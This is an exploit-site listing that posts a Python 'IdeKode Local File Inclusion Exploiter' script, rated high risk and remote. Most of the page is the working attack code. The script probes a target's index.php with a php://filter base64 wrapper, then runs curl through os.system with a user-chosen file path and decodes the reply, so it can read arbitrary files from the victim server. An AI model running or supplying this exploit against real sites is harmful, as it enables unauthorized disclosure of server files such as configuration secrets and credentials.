IdeKode Local File Inclusion Exploiter

2020.12.10
us Nano (US) us
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Original : https://cxsecurity.com/issue/WLB-2020080031 Exploit: https://github.com/Proxysec/IDEKODE-LFI/blob/main/exploit.py Exploit raw: import requests import os def banner(): print(f"""" _________ ______ _______ _ _______ ______ _______ _ _______ _________ \__ __/( __ \ ( ____ \| \ /\( ___ )( __ \ ( ____ \( \ ( ____ \\__ __/ ) ( | ( \ )| ( \/| \ / /| ( ) || ( \ )| ( \/| ( | ( \/ ) ( | | | | ) || (__ | (_/ / | | | || | ) || (__ | | | (__ | | | | | | | || __) | _ ( | | | || | | || __) | | | __) | | | | | | ) || ( | ( \ \ | | | || | ) || ( | | | ( | | ___) (___| (__/ )| (____/\| / \ \| (___) || (__/ )| (____/\| (____/\| ) ___) (___ \_______/(______/ (_______/|_/ \/(_______)(______/ (_______/(_______/|/ \_______/ | Exploiter by Nano | ORG : https://cxsecurity.com/issue/WLB-2020080031 """) def exploit(): try: banner() x = input("Site: ") url = x+'' p = requests.get(url+'index.php?link=php://filter/convert.base64-encode/resource=&id=8') if p.status_code == 404: print("Site is not Vuln") return else: o = input("LFI: ") pay = o os.system(f"curl {url}index.php?link=php://filter/convert.base64-encode/resource={pay}&id=8 | base64 -d") print("Look For the base64 hash ends with ==") except: print(f"Something went wrong {url}") #LFI() return exploit()

References:

https://cxsecurity.com/issue/WLB-2020080031


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top